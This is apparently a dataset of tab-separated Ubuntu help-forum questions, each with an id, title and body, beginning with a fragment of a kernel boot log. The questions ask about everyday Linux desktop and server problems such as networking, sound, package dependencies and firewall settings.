] edac amd64 : ecc disabled in the bios or no ecc capability , module will not load . jul 5 15:50:15 my-pc-name kernel : [ 40.871454 ] either enable ecc checking or force module loading by setting 'ecc_enable_override ' . jul 5 15:50:15 my-pc-name kernel : [ 40.871454 ] ( note that use of the override may cause unknown side effects . ) jul 5 15:50:15 my-pc-name kernel : [ 40.874034 ] it87 : found it8728f chip at 0x228 , revision 1 jul 5 15:50:15 my-pc-name kernel : [ 40.874051 ] it87 : beeping is supported jul 5 15:50:15 my-pc-name kernel : [ 40.883133 ] parport_pc 00:09 : reported by plug and play acpi jul 5 15:50:15 my-pc-name kernel : [ 40.883186 ] parport0 : pc-style at 0x378 , irq 7 [ pcspp , tristate ] jul 5 15:50:15 my-pc-name kernel : [ 40.914736 ] cfg80211 : calling crda to update world regulatory domain jul 5 15:50:15 my-pc-name kernel : [ 40.923273 ] microcode : cpu0 : patch_level=0x0600081c jul 5 15:50:15 my-pc-name kernel : [ 40.955801 ] input : hda ati sb line as /devices/pci0000:00/0000:00:14.2/sound/card0/input5 jul 5 15:50:15 my-pc-name kernel : [ 40.959980 ] input : hda ati sb front mic as /devices/pci0000:00/0000:00:14.2/sound/card0/input6 jul 5 15:50:15 my-pc-name kernel : [ 40.960047 ] input : hda ati sb rear mic as /devices/pci0000:00/0000:00:14.2/sound/card0/input7 jul 5 15:50:15 my-pc-name kernel : [ 40.960107 ] input : hda ati sb front headphone as /devices/pci0000:00/0000:00:14.2/sound/card0/input8 jul 5 15:50:15 my-pc-name kernel : [ 40.960168 ] input : hda ati sb line out as /devices/pci0000:00/0000:00:14.2/sound/card0/input9 jul 5 15:50:15 my-pc-name kernel : [ 40.960467 ] snd_hda_intel 0000:01:05.1 : setting latency timer to 64 jul 5 15:50:15 my-pc-name kernel : [ 40.970611 ] input : hda ati hdmi hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:01.0/0000:01:05.1/sound/card1/input10 jul 5 15:50:15 my-pc-name kernel : [ 40.971885 ] lp0 : using parport0 ( interrupt-driven ) . jul 5 15:50:15 my-pc-name kernel : [ 40.978601 ] ppdev : user-space parallel port driver jul 5 15:50:15 my-pc-name kernel : [ 40.984004 ] cfg80211 : world regulatory domain updated : jul 5 15:50:15 my-pc-name kernel : [ 40.984007 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jul 5 15:50:15 my-pc-name kernel : [ 40.984009 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 5 15:50:15 my-pc-name kernel : [ 40.984012 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jul 5 15:50:15 my-pc-name kernel : [ 40.984013 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jul 5 15:50:15 my-pc-name kernel : [ 40.984015 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 5 15:50:15 my-pc-name kernel : [ 40.984017 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 5 15:50:15 my-pc-name kernel : [ 41.039772 ] usb 10-1 : reset high-speed usb device number 2 using xhci_hcd jul 5 15:50:15 my-pc-name kernel : [ 41.057111 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880103c5e400 jul 5 15:50:15 my-pc-name kernel : [ 41.057114 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880103c5e440 jul 5 15:50:15 my-pc-name kernel : [ 41.057116 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880103c5e480 jul 5 15:50:15 my-pc-name kernel : [ 41.057117 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880103c5e4c0 jul 5 15:50:15 my-pc-name kernel : [ 41.060238 ] ieee80211 phy0 : selected rate control algorithm 'minstrel_ht' jul 5 15:50:15 my-pc-name kernel : [ 41.060384 ] zd1211rw 10-1:1.0 : phy0 jul 5 15:50:15 my-pc-name kernel : [ 41.060404 ] usbcore : registered new interface driver zd1211rw jul 5 15:50:15 my-pc-name kernel : [ 41.118265 ] microcode : cpu1 : patch_level=0x0600081c jul 5 15:50:15 my-pc-name kernel : [ 41.118273 ] microcode : cpu2 : patch_level=0x0600081c jul 5 15:50:15 my-pc-name kernel : [ 41.118280 ] microcode : cpu3 : patch_level=0x0600081c jul 5 15:50:15 my-pc-name kernel : [ 41.118288 ] microcode : cpu4 : patch_level=0x0600081c jul 5 15:50:15 my-pc-name kernel : [ 41.118295 ] microcode : cpu5 : patch_level=0x0600081c jul 5 15:50:15 my-pc-name kernel : [ 41.118345 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba jul 5 15:50:15 my-pc-name kernel : [ 41.129513 ] kvm : nested virtualization enabled jul 5 15:50:15 my-pc-name kernel : [ 41.129518 ] kvm : nested paging enabled jul 5 15:50:15 my-pc-name kernel : [ 41.361009 ] type=1400 audit ( 1373032214.404:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=820 comm= '' apparmor_parser '' jul 5 15:50:15 my-pc-name kernel : [ 41.361168 ] type=1400 audit ( 1373032214.404:3 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=765 comm= '' apparmor_parser '' jul 5 15:50:15 my-pc-name kernel : [ 41.361174 ] type=1400 audit ( 1373032214.404:4 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=764 comm= '' apparmor_parser '' jul 5 15:50:15 my-pc-name kernel : [ 41.361269 ] type=1400 audit ( 1373032214.404:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=820 comm= '' apparmor_parser '' jul 5 15:50:15 my-pc-name kernel : [ 41.361412 ] type=1400 audit ( 1373032214.404:6 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=820 comm= '' apparmor_parser '' jul 5 15:50:15 my-pc-name kernel : [ 41.361573 ] type=1400 audit ( 1373032214.404:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=765 comm= '' apparmor_parser '' jul 5 15:50:15 my-pc-name kernel : [ 41.361578 ] type=1400 audit ( 1373032214.404:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=764 comm= '' apparmor_parser '' jul 5 15:50:15 my-pc-name kernel : [ 41.361796 ] type=1400 audit ( 1373032214.404:9 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=765 comm= '' apparmor_parser '' jul 5 15:50:15 my-pc-name kernel : [ 41.361801 ] type=1400 audit ( 1373032214.404:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=764 comm= '' apparmor_parser '' jul 5 15:50:15 my-pc-name kernel : [ 41.363174 ] type=1400 audit ( 1373032214.404:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/ntpd '' pid=850 comm= '' apparmor_parser '' jul 5 15:50:15 my-pc-name kernel : [ 42.180878 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro jul 5 15:50:15 my-pc-name kernel : [ 42.373804 ] bluetooth : core ver 2.16 jul 5 15:50:15 my-pc-name kernel : [ 42.373821 ] net : registered protocol family 31 jul 5 15:50:15 my-pc-name kernel : [ 42.373828 ] bluetooth : hci device and connection manager initialized jul 5 15:50:15 my-pc-name kernel : [ 42.374105 ] bluetooth : hci socket layer initialized jul 5 15:50:15 my-pc-name kernel : [ 42.374109 ] bluetooth : l2cap socket layer initialized jul 5 15:50:15 my-pc-name kernel : [ 42.374117 ] bluetooth : sco socket layer initialized jul 5 15:50:15 my-pc-name kernel : [ 42.377019 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 jul 5 15:50:15 my-pc-name kernel : [ 42.377022 ] bluetooth : bnep filters : protocol multicast jul 5 15:50:15 my-pc-name kernel : [ 42.377029 ] bluetooth : bnep socket layer initialized jul 5 15:50:15 my-pc-name kernel : [ 42.383213 ] bluetooth : rfcomm tty layer initialized jul 5 15:50:15 my-pc-name kernel : [ 42.383222 ] bluetooth : rfcomm socket layer initialized jul 5 15:50:15 my-pc-name kernel : [ 42.383224 ] bluetooth : rfcomm ver 1.11 jul 5 15:50:15 my-pc-name kernel : [ 42.648253 ] r8169 0000:03:00.0 eth0 : link down jul 5 15:50:15 my-pc-name kernel : [ 42.648275 ] r8169 0000:03:00.0 eth0 : link down jul 5 15:50:15 my-pc-name kernel : [ 42.648299 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready jul 5 15:50:15 my-pc-name kernel : [ 42.648615 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready jul 5 15:50:16 my-pc-name kernel : [ 43.022195 ] zd1211rw 10-1:1.0 : firmware version 4605 jul 5 15:50:16 my-pc-name kernel : [ 43.027245 ] zd1211rw 10-1:1.0 : zd1211 chip 0ace:1211 v4330 high 00-30-95 rf2959_rf pa0 -- -- - jul 5 15:50:16 my-pc-name kernel : [ 43.027577 ] cfg80211 : calling crda for country : de jul 5 15:50:16 my-pc-name kernel : [ 43.030374 ] cfg80211 : regulatory domain changed to country : de jul 5 15:50:16 my-pc-name kernel : [ 43.030376 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jul 5 15:50:16 my-pc-name kernel : [ 43.030378 ] cfg80211 : ( 2400000 khz - 2483500 khz @ 40000 khz ) , ( n/a , 2000 mbm ) jul 5 15:50:16 my-pc-name kernel : [ 43.030379 ] cfg80211 : ( 5150000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) jul 5 15:50:16 my-pc-name kernel : [ 43.030381 ] cfg80211 : ( 5250000 khz - 5350000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) jul 5 15:50:16 my-pc-name kernel : [ 43.030382 ] cfg80211 : ( 5470000 khz - 5725000 khz @ 40000 khz ) , ( n/a , 2698 mbm ) jul 5 15:50:16 my-pc-name kernel : [ 43.045335 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready jul 5 15:50:16 my-pc-name kernel : [ 43.045556 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready jul 5 15:50:16 my-pc-name kernel : [ 43.567501 ] unsafe core_pattern used with suid_dumpable=2 . pipe handler or fully qualified core dump path required . jul 5 15:50:17 my-pc-name kernel : [ 44.086456 ] vboxdrv : found 6 processor cores . jul 5 15:50:17 my-pc-name kernel : [ 44.086626 ] vboxdrv : fasync=0 offmin=0x394 offmax=0x2efb jul 5 15:50:17 my-pc-name kernel : [ 44.086695 ] vboxdrv : tsc mode is 'synchronous ' , kernel timer mode is 'normal ' . jul 5 15:50:17 my-pc-name kernel : [ 44.086696 ] vboxdrv : successfully loaded version 4.2.10_ubuntu ( interface 0x001a0004 ) . jul 5 15:50:17 my-pc-name kernel : [ 44.108998 ] vboxpci : iommu not found ( not registered ) jul 5 15:50:17 my-pc-name kernel : [ 44.305046 ] r8169 0000:03:00.0 eth0 : link up jul 5 15:50:17 my-pc-name kernel : [ 44.305053 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready jul 5 15:50:20 my-pc-name kernel : [ 47.376693 ] audit_printk_skb : 86 callbacks suppressed jul 5 15:50:20 my-pc-name kernel : [ 47.376697 ] type=1400 audit ( 1373032220.423:40 ) : apparmor= '' denied '' operation= '' open '' parent=1235 profile= '' /sbin/dhclient '' name= '' /var/lib/networkmanager/dhclient6-eth0.conf '' pid=2094 comm= '' dhclient '' requested_mask= '' r '' denied_mask= '' r '' fsuid=0 ouid=0
316675	software to 'lock ' computer every half hour	i seem to remember seeing some software that limits my computer time , and 'locks ' my computer every half hour for five minutes , for example . if i just remembered wrong , is there some sort of software that could do that type of thing ?
316677	configure second network card/interface	i 'm configuring one server ( ubuntu 12.04 64bits , with kvm ) with 2 card adapters . the first one ( eth0 ) is configured to work with virtual bridge ( vbr0 ) for the dmz interface . ho can i condigure the second one ( eth1 ) to work with the lan interface ( 192.168.1.8 as static ip address ) . here is the actual configuration ( /etc/newtork/interfaces ) auto lo eth0 eth1 br0 iface lo inet loopback iface eth0 inet manual iface br0 inet static address 192.168.4.8 netmask 255.255.255.0 broadcast 192.168.4.255 network 192.168.4.0 gateway 192.168.4.1 bridge_ports eth0 bridge_fd 9 bridge_hello 2 bridge_maxage 12 bridge_stp off thanks for the support ! ! !
316683	i can not see the time in the menu bar	since i re-installed ubuntu 13.04 , i ca n't see the time next to the volume control . i installed unity tweak but the show time box is already checked . what can i do ?
316688	is there any solution to do per process based traffic shaping in ubuntu ?	is there any solution to use per process basis ? i mean when i do http download , i ca n't browse web . it 's no use to prioritize traffic based on protocol in this case . so , what i need is to give firefox process high priority and wget process to low priority . so i can brows web and use http downloads too . in windows it 's possible by using cfosspeed software . so , in linux , it should be possible , because in linux everything can be done . please somebody help me..
316694	will ubuntu touch include support for bluetooth low energy	i tried looking around the launchpad see if i found a bluetooth project for ubuntu touch but was n't able too find one . will ubuntu touch include support for bluetooth low energy ?
316699	missing items in software centre	i 've been setting up a couple of computers with ubuntu , and making sure they all have a couple of packages i need . when i looked for the packages in the software centre on most of them they were there , but on a couple they were nowhere to be found . i got them just fine using apt-get , but it seemed odd that the selection in the software centre was inconsistent between otherwise identical computers .
316700	usb microphone quits working after a few seconds	on my mythbuntu 12.04.2 htpc , my usb microphone ( logitech ak5370 ) works for a few seconds , then stops producing signal from audio input . the system recognizes it there , it just stays mute . this happens on all usb ports . it has worked fine for months . i`m confident it 's not the hardware because the microphone works fine with win7 and also on other computers . $ uname -a linux kise-066 3.5.0-34-generic # 55~precise1-ubuntu smp fri jun 7 16:25:50 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ lsusb bus 001 device 002 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 005 device 002 : id 1532:001c razer usa , ltd rz01-0036 optical gaming mouse [ abyssus ] bus 005 device 003 : id 0556:0001 asahi kasei microsystems co. , ltd ak5370 i/f a/d converter bus 006 device 002 : id 04ca:002a lite-on technology corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 001 device 004 : id 046d : c525 logitech , inc. mx revolution cordless mouse re-install of mythbuntu is impracticable . i tried the fix in this question ( changing gstreamer settings ) but it did n't work . after every change , the mic would work as seen on pulse audio volume control for a few seconds , then the `` level '' on the level caught at the few seconds when it stopped working . i installed audacity to monitor the microphone 's input level . with the settings alsa > default > ak5370 : usb audio ( hw:1,0 ) : line 0 the level meter shows the mic working . using a `` trick '' from the old days , i re-installed the following ... gstreamer0.10-pulseaudio ( version 0.10.31-1ubuntu1.2 ) will be re-installed libcanberra-pulse ( version 0.28-3ubuntu3 ) will be re-installed libpulse-mainloop-glib0 ( version 1:1.1-0ubuntu15.3 ) will be re-installed libpulse-mainloop-glib0 : i386 ( version 1:1.1-0ubuntu15.3 ) will be re-installed libpulse0 ( version 1:1.1-0ubuntu15.3 ) will be re-installed libpulse0 : i386 ( version 1:1.1-0ubuntu15.3 ) will be re-installed libpulsedsp ( version 1:1.1-0ubuntu15.3 ) will be re-installed libpulsedsp : i386 ( version 1:1.1-0ubuntu15.3 ) will be re-installed libusb-0.1-4 ( version 2:0.1.12-20 ) will be re-installed libusb-0.1-4 : i386 ( version 2:0.1.12-20 ) will be re-installed libusb-1.0-0 ( version 2:1.0.9~rc3-2ubuntu1 ) will be re-installed paman ( version 0.9.4-1ubuntu3 ) will be re-installed paprefs ( version 0.9.10-0ubuntu1 ) will be re-installed pavucontrol ( version 0.99.2-1build1 ) will be re-installed pavumeter ( version 0.9.3-1ubuntu2 ) will be re-installed pulseaudio ( version 1:1.1-0ubuntu15.3 ) will be re-installed pulseaudio-module-gconf ( version 1:1.1-0ubuntu15.3 ) will be re-installed pulseaudio-module-x11 ( version 1:1.1-0ubuntu15.3 ) will be re-installed pulseaudio-module-zeroconf ( version 1:1.1-0ubuntu15.3 ) will be re-installed pulseaudio-utils ( version 1:1.1-0ubuntu15.3 ) will be re-installed usbutils ( version 1:005-1 ) will be re-installed ... and rebooted . no help . i have discovered that after closing and reopening pulse audio volume control , the microphone volume level will show the microphone working fo a few seconds , then `` freezing '' . ? ? ?
316706	how to set environment variables for anacron ?	i 'm currently tinkering with anacron 2.3 on a ubuntu 12.04 ( precise ) installation . i have been trying to make use of the start_hours_range and random_delay env vars . my /etc/anacrontab looks like this : # /etc/anacrontab : configuration file for anacron # see anacron ( 8 ) and anacrontab ( 5 ) for details . shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin start_hours_range=3-5 random_delay=30 # these replace cron 's entries 1 5 cron.daily nice run-parts -- report /etc/cron.daily 7 10 cron.weekly nice run-parts -- report /etc/cron.weekly @ monthly 15 cron.monthly nice run-parts -- report /etc/cron.monthly 1 0 test.job echo 'test job' the thing is , when i manually run anacron using sudo anacron -s the test job is executed immediately , even though i 'm outside the start time range and there is a random delay associated . i do n't know what else to do to reproduce the behaviour described in the manpage for anacrontab ( 5 ) i already thank you for any help that you could give me . goodbye , nicolรกs carrasco stevenson
316714	software availability	i 've been using ubuntu for the past year or so , and i swear , i have turned into the biggest ubuntu fanboy in the world , i absolutely love everything about ubuntu except for this one little thing . software availability t.t . i need certain softwares to do the things i need , i 'm a web designer/graphic designer and i 'll be honest , i miss photoshop . gimp is great and all , but its considerably less in comparison to photoshop . another software i need badly is manga studio 4.0 i 've run it through wine but it does n't pick up the sensitivity on my tablet , and its very unresponsive , which is bad because its supposed to be a precise software that i use to save some money on ink and for adding screentones to my drawings . these are the only 2 softwares i really need and its the only reason i 'm planning on going back to windows when i get my new computer . my question is , are there anyways i can use these softwares without having to go back to windows , i was planning on getting a virtualbox software but my current cpu ca n't handle the strain . i 'm getting a new cpu sometime this month with these specs processor : intel 7 dual-core 3.0ghz ram : 8gb hdd : 1tb g-card : nvidia geforce gt 645 m are these specs good enough to run a virtual box as smoothly as possible ? this will be a custom pc so specs are upgradeable before i order it , so i could get the best pc possible , please help out . i really want to stay with ubuntu no matter what , and i really do n't want to have to dual-boot everytime i want to use a certain software t.t .
316724	edubuntu software for windows	i need to install the edubuntu software on windows system not a ubuntu system . wo n't all the programs run on any system ? how do i get just the educational programs ?
316726	ipod touch not mounting properly on ubuntu 13.04	after upgrading to 13.04 , my ipod touch ( 4.2.1 ) mounts as normal , but then disappears from the devices pane and appears under the network pane in nautilus . i then get error messages saying the ipod could not mount . if rhythmbox is open it will actually appear in rhythmbox and then disappear . this is very frustrating as i had no problems syncing with prior versions of ubuntu . does anyone have a fix for this ?
316729	problem with steam and unity	i installed ubuntu 12.04 and the whole reason that i did so was to be able to run steam . well , steam opens up just fine . but , once i actually start trying to play games , it 's completely screwed . crusader kings 2 , specifically . it wo n't open the game . why is everything at the top of the screen ? why is it so hard to find everything now ? why does this alleged upgrade suck so badly when compared to what was upgraded from ? and , most importantly , how do i go back to what worked ? i do n't even care about steam anymore . i want to completely uninstall it as well at this point . please assume that i know absolutely nothing about computers , even though i do .
316736	why are some ocred pdfs greppable , and some are n't ?	so let 's say i have 10 files that are searchable using pdfgrep of those , some are searchable using grep and some aren't why 's that ? what 's the trait that allows a pdf to be greppbale ?
316740	ca n't install webapps in ubuntu 13.04	i installed ubuntu 13.04 and i want to install unity webapps like twitter - gmail and facebook . i opened gmail and twitter in firefox and chromium in order to install them but nothing appears . do i have to install them or what should i do ? ! !
316744	in ubuntu studio , what is the name of the auto-hide panel at the bottom ?	how would i add it to another distro with xfce ?
316745	explanation of the chcon command	hi could somebody explain this command . chcon -r -- reference=/var/www/html/ /var/www/html/install i have read the explanation given in the book but i am unable to understand it clearly . please use simple terminology while explain the command . thank you .
316753	xrdp screen size is tiny	i am using windows7 remote desktop connection . the 'display ' settings for rdc are set to [ 1920x1080 ] . when remote desktoping into my ubuntu server 12.04 , i get a 1920x1080 window . however , the actual view of the ubuntu terminal is about 600x400 . since an image says 1k words , here you can see two of them : remote desktop connection settings : tiny resolution :
316754	wubi : hide windows boot manager unless i want to boot ubuntu	some time ago i installed ubuntu through wubi for learning and testing purposes . after that , every time i start the pc the windows boot manager shows up and asks me which os i want to boot into - ubuntu or windows 7 . since most of the time i 'm using windows , i 'd like to know if there 's a way to skip the boot menu when turning on the pc and boot straight to windows by default but still be able to press a key and boot to ubuntu if i want to on the next restart . how can i do that ?
316758	how do i delete the download history from ubuntu software center on ubuntu 12.10 ?	i 'm using ubuntu 12.10 and need to delete the download history from the ubuntu software center for privacy reasons . i 've already tried `` forget activities '' in privacy ( from the system settings ) , but it does n't delete the download history . i also tried the `` possible duplicate answer '' ( how to delete history of installed packages ) , and the question is the same , but the solution did not work ( i have no ~/var folder in my directory ) .
316760	ubuntu touch apps do n't open on desktop 13.04	i followed the instructions here , but when i tried to launch an app , nothing happened . there were no errors while installing on terminal either . did i forget something ? now some are working : calculator email client rss reader the others do n't do anything . edit : after a few updates , all apps work . maybe it upgraded some dependancies or something .
316761	how can i permanently sync my videos in ubuntu 13.04 ?	so some of my videos are out of sync and although i can temporarily fix it ( i use vlc ) it does not fix this issue permanently . is there a way to fix this ? maybe software ( from the software center ) that will allow me to change the sync ? ( i have dell mini inspiron 10v , so it may struggle with some software ) .
316763	missing window switcher and expo not working	i just installed ubuntu 13.04 ( 64 bit ) . unfortunately it seems that my favourite window switcher in compiz is missing in 13.04 ? does anyone know if : this is a bug . there is a way to get it back ( maybe a plugin ) this is because i used the software center to install compiz which results in an out of date version ? also , the shortcut to trigger the expo is super-s , however this only works sometimes , such as after a reboot . right now , i am having to manually click this icon to have the same effect . is there a way i can just map that icon to the keyboad shortcuts ( workaround ) ? also , the 'commands ' feature appears to be missing from compiz as well ( it used to be by 'general ' . this is 'ok ' as i have managed to set everything from the normal keyboard shortcuts menu for now as shown here : summary : how can i install the compiz window switcher in ubuntu 13.04 . how do i get the 'expo ' feature to always trigger when i press cntrl-s update : it appears that disabling the launcher key ( super ) also disables the expo functionality ( super-s ) . is there any way to disable the launcher without disabling the 'expo ' functionality .
316765	powerpoint compatibility issues in ubuntu and windows	i have made power point presentation using ubuntu . now i want to open same file in windows xp or windows 7 . how can i do it ? does simply copying the file in windows and opening with microsoft power point solves problem ?
316768	getting rid of preinstalled software	i want to use my old netbook for a few very simple purposes , mainly accounting - spreadsheet documents and going online to get numbers . i have another computer for gaming , movies and all other bell and whistle programs . i want the netbook system as clean and streamlined as possible . so i returned my netbook to factory settings , which unfortunately came with a ton of windows based bloatware . if i do a complete install of ubuntu as the sole os , will it actually wipe out these unwanted programs ( e.g . norton antivirus trial ) ? if not , can i uninstall them after i install ubuntu , or do i need to wipe them out beforehand ?
316770	how can i downgrade abiword to version 2.8.6 ?	the abiword version ( 2.9.2 ) that is installed ( with lubuntu in my case ) has many bugs ! does anyone know if/when ubuntu will switch this back to the stable version ( 2.8.6 ) ?
316775	google talk > gufw set to deny/deny does block . please help	i have my ubuntu 12.04 server . i installed google talk in it . i opened gufw , and set it to deny/deny and there are no allow rules . now firefox wont connect to the internet which is good ... but ... google talk still can send and receive text messages . why is this ? i am stumped : ( 1 ) here is my ufw settings ( gufw has deny deny clicked ) mathew @ ubuntu : ~ $ sudo ufw status status : active to action from -- -- -- -- -- -- 51413/tcp deny anywhere 51413/udp deny anywhere 443/tcp deny anywhere 6881/tcp deny anywhere 6881/udp deny anywhere 2234:2239/tcp deny anywhere 2242/tcp deny anywhere 2240/tcp deny anywhere 4444/udp deny anywhere 6881:6891/tcp deny anywhere 6881:6891/udp deny anywhere 4662/tcp deny anywhere 4672/udp deny anywhere 53 deny anywhere cups deny anywher
316776	can not install xbmc	i am unable to install xbmc even after follwing all the steps ... this is the error message reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xbmc : depends : xbmc-bin ( > = 2:12.2~git20130502.1706-frodo-0raring ) but it is not going to be installed depends : xbmc-bin ( < 2:12.2~git20130502.1706-frodo-0raring.1~ ) but it is not going to be installed depends : mesa-utils but it is not installable depends : ttf-liberation but it is not installable depends : python-bluez but it is not installable or python-lightblue but it is not installable depends : python-simplejson but it is not installable depends : swig but it is not installable depends : libnfs1 but it is not installable depends : libcec2 ( > = 2.1.1 ) but it is not going to be installed depends : python-support ( > = 0.90.0 ) but it is not installable recommends : python-qt3 but it is not installable recommends : libvdpau1 but it is not installable recommends : xbmc-pvr-mythtv-cmyth but it is not going to be installed recommends : xbmc-pvr-vuplus but it is not going to be installed recommends : xbmc-pvr-vdr-vnsi but it is not going to be installed recommends : xbmc-pvr-njoy but it is not going to be installed recommends : xbmc-pvr-nextpvr but it is not going to be installed recommends : xbmc-pvr-mediaportal-tvserver but it is not going to be installed recommends : xbmc-pvr-tvheadend-hts but it is not going to be installed recommends : xbmc-pvr-dvbviewer but it is not going to be installed recommends : xbmc-pvr-argustv but it is not going to be installed e : unable to correct problems , you have held broken packages .
316778	ubuntu 13.04 - ca n't login to unity , keep going back to login screen with all users	today i 've updated openssl and libssl ( automatic update ) . after reboot i ca n't login with any user ( even with guest or new one ) into x. i 've tried with installing gdm , gnome-session-fallback - no luck . on login screen ( no matter if it 's lightdm or gdm ) i type password , it tries to login , then screen goes black and returns to login screen . i 've found somewhere solution with xauthority and xsession-errors , but in .xsession-errors i do n't have anything but two lines : script for cjkv started at run_im . script for default starter at run_im . i 'm using linux for about 10 years , but i ca n't find anything in /var/log that can point me to solution . reinstalling ubuntu is not a solution for me . someone can help me ?
316783	how to access a /media folder that has been mounted from a external hardrive ?	i 'm using ubuntu 13.04 x64 . i have installed apache , php5 . i have configured two sites folders in the /etc/apache2/sites-available/default one is the in /home/me/www and the other is on the external disk let 's say /media/me/www . i think the problem is that /media is owned by root and all files had restrictive permissions , so i can only see my files in my computer , or with sftp or samba , login with my username . what i want is to view those files in apache from another computer , but the server always gave me the 403 forbidden message . i was thinking of changing the owner of the media folder , and to change the files permissions . or i found i could mount the drive in another path , but that would be more problematic because i already have some apps using that path . my question what do i have to do to allow access to apache to show the media folder ? the hard drive is ntfs format . also i 'm not an expert in linux , but knows the basics .
316788	read contents of a previous fedora hard drive	i have this fedora 18 , spherical cow os which has not been very stable . so i am migrating to ubuntu 11.10 i need to read the contents of the disk , so i can copy all my development files there . how can i do that . it seems when i plug the disk as external usb disk , i do n't get to see the partition mounted ?
316792	discrepancy with firefox print ( headers and footers )	ubuntu desktop 12.04 lts on a dell pc . created 2 user accounts . both are administrator . user u1 , when printing in firefox ( a web site ) , print options work . specifically , headers and footers to get page # of # , title , url , etc . user u2 , same operation . print options not working - does not print requested headers and footers ( page # of # , title , url ) . it prints , but does not apply the requested options . same target printer ( brother hl-3075cw , via usb )
316801	how to enter single-user mode in ubuntu 13.04 to install e4rat ?	i 've just upgraded to ubuntu 13.04 on my hp dv6 , and i 've been going through the usual ritual of setting up bumblebee etc . since jupiter is no longer supported , i followed the steps here to install tlp . i also followed the instructions in the update section of the answer , to add powersavingtweaks for intel graphics by editing /etc/default/grub to grub_cmdline_linux_default= '' quiet splash pcie_aspm=force i915.lvds_downclock=1 drm.vblankoffdelay=1 i915.semaphores=1 '' i then got down to installing e4rat , following the procedure described here . i managed to successfully run e4rat-collect , but i ca n't complete the rest of the procedure ( the e4rat-realloc portion ) , since i am unable to boot into the single-user mode . the steps i followed are the same as those mentioned in the htg article . however , the screen goes black , some stuff gets loaded up , the screen gets cleared and then i see a message saying kvm : diabled by bios with the cursor blinking below it . i have waited for more than an hour , tried ctrl+alt+f1 , but all to no avail . i have also tried moving single around in that line - before quiet splash , after quiet splash , at the end of the line ( after vthandoff ) . i have even tried deleting the power saving tweak code and replacing it with single , but i get the same result every time . interestingly , before i started this entire procedure , i had tried to boot into single-user mode and it had worked back then .
316803	nexus 7 with ubuntu touch stuck on google screen	i started to install the ubuntu touch image and once the ubuntu touch screen came up with the logo and one of the options was to restart , so i restarted it and now it is stuck on the google screen . i have the nexus 7 . i ca n't try to install ubuntu or android on it now because it has to be on in order for me to use adb . please help . hope i did n't brick my nexus 7
316804	sound only works from left speaker ?	after installing ubuntu 13.04 x64 , i realised that my sound was n't working ( only headphone showed up in settings ) . following this guide , i manually added my dell studio 1740 audio hardware to : options snd-hda-intel model=dell-m6 within etc/modprobe.d/alsa-base.conf . using the test speakers feature , i found that no sound was coming out of my right speaker ( the one with the power and volume dials ) .
